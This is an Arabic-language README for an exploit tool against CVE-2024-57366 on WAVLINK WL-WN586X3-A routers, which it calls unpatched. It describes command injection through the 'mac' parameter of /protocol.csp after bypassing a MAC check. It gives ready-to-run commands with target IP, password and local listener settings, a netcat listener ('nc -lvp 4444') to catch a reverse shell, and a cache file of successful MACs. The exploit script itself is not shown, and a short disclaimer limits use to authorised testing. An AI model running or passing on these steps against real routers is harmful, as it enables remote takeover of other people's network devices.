
استغلال مُنتَج للثغرة CVE-2024-57366 على أجهزة توجيه WAVLINK WL-WN586X3-A (غير مُصَحَّحة حتى هذا الإصدار!)
أداة استغلال قوية لـ CVE-2024-57366 تتيح تنفيذ الأوامر عن بُعد على أجهزة التوجيه (الراوترات) الضعيفة من خلال تجاوز التحقق من عنوان MAC وحقن الأوامر.
هذا استغلال بعد التصديق (post-authorization) يتطلب تفعيل ميزة "التحكم عن بُعد" في الراوتر، بالإضافة إلى كلمة مرور الإدارة. اسم مستخدم الإدارة مُثبت بقيمة "admin".
sudo (مطلوبة لإدارة واجهة الشبكة)pip3 install requests
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
# سيسأل البرنامج النصي: "Use cached MAC for quick exploit? (y/n):" - قل "y"
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123 --force-full
python3 exploit.py --list-cached
--target - عنوان IP للراوتر الهدف (الافتراضي: 127.0.0.1)--port - منفذ الراوتر الهدف (الافتراضي: 80)--local-ip - عنوان IP المحلي الخاص بك لاستدعاء الصدفة العكسية--local-port - المنفذ المحلي لاستدعاء الصدفة العكسية (الافتراضي: 4444)--password - كلمة مرور إدارة الراوتر--ssid - اسم شبكة WiFi (الافتراضي: WAVLINK-Mesh_DC4B)--force-full - فرض الاستغلال الكامل، تخطي فحص MAC المخزن--list-cached - عرض عناوين MAC المخزنة والخروجيستغل CVE-2024-57366 تجاوز التحقق من عنوان MAC في برنامج الثابتة (firmware) للراوتر. تتيح الثغرة حقن الأوامر من خلال المعامل mac في نقطة النهاية /protocol.csp.
eth0 للحفاظ على سياق الشبكة الأصليindex=1، الرمز في مسار URL)يقوم الاستغلال تلقائيًا بتخزين عناوين MAC الناجحة في الملف successful_macs.txt:
# CVE-2024-57366 Successful MAC Addresses
# Format: MAC_ADDRESS TARGET_IP TIMESTAMP
# You can manually add entries here
32:98:A2:A8:5F:5F 192.168.1.187 1758305048.0 # 2025-09-19 14:44:08
إضافة MAC يدويًا: قم بتحرير successful_macs.txt وأضف سطورًا مثل:
AA:BB:CC:DD:EE:FF 192.168.1.100 1758305048.0 # 2025-09-19 14:44:08
# بدء مستمع netcat
nc -lvp 4444
# تشغيل الاستغلال
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
# عند الطلب لحفظ عنوان MAC، قل "y"
# بدء مستمع netcat
nc -lvp 4444
# تشغيل الاستغلال (سيستخدم MAC المخزن)
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
# قل "y" عند السؤال عن استخدام MAC المخزن
"لم يتم العثور على محولات لاسلكية"
sudo"فشل التحقق من عنوان MAC"
"انتهت مهلة الطلب"
"الصدفة العكسية لا تتصل"
--local-ip (استخدم ip addr show eth0)CVE-2024-57366/
├── exploit.py # البرنامج النصي الرئيسي للاستغلال
├── successful_macs.txt # ذاكرة التخزين المؤقت لعناوين MAC (يتم إنشاؤها تلقائيًا)
└── README.md # هذا الملف
هذه الأداة مخصصة للأغراض التعليمية والاختبار المصرح به فقط. استخدمها فقط على الأنظمة التي تملكها أو لديك إذن صريح لاختبارها. المؤلفون غير مسؤولين عن أي استخدام خاطئ لهذه الأداة.
/protocol.cspيُقدم هذا المشروع كما هو للأغراض التعليمية. استخدمه بمسؤولية ووفقًا للقوانين واللوائح المعمول بها.